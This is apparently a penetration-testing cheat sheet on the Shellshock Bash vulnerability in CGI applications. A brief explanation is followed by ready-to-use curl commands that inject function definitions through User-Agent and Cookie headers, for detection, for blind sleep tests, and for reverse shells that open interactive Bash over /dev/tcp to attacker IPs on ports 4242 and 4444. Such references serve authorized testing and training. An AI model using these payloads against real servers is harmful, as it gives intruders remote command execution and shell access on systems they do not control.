CGI

ShellShock

Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an attacker can tack-on malicious code to the environment variable, which will run once the variable is received. Exploiting this vulnerability the page could throw an error. You could find this vulnerability noticing that it is using an old Apache version and cgi_mod (with cgi folder) or using nikto.

Reflected

curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'

(you could also make a ping or web request to yourself and monitor that oth tcpdump)

curl -k -H 'User-Agent: () { :; }; sleep 5' https://10.129.1.226:10000/left.cgi

curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi

Out-Of-Band Use

Cookie as alternative to User-Agent

curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh

Reverse shell

curl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/10.10.16.2/4444 <&1"' https://10.129.1.226:10000/left.cgi

CGI

ShellShock

Reflected

Blind with sleep

Out-Of-Band Use

Reverse shell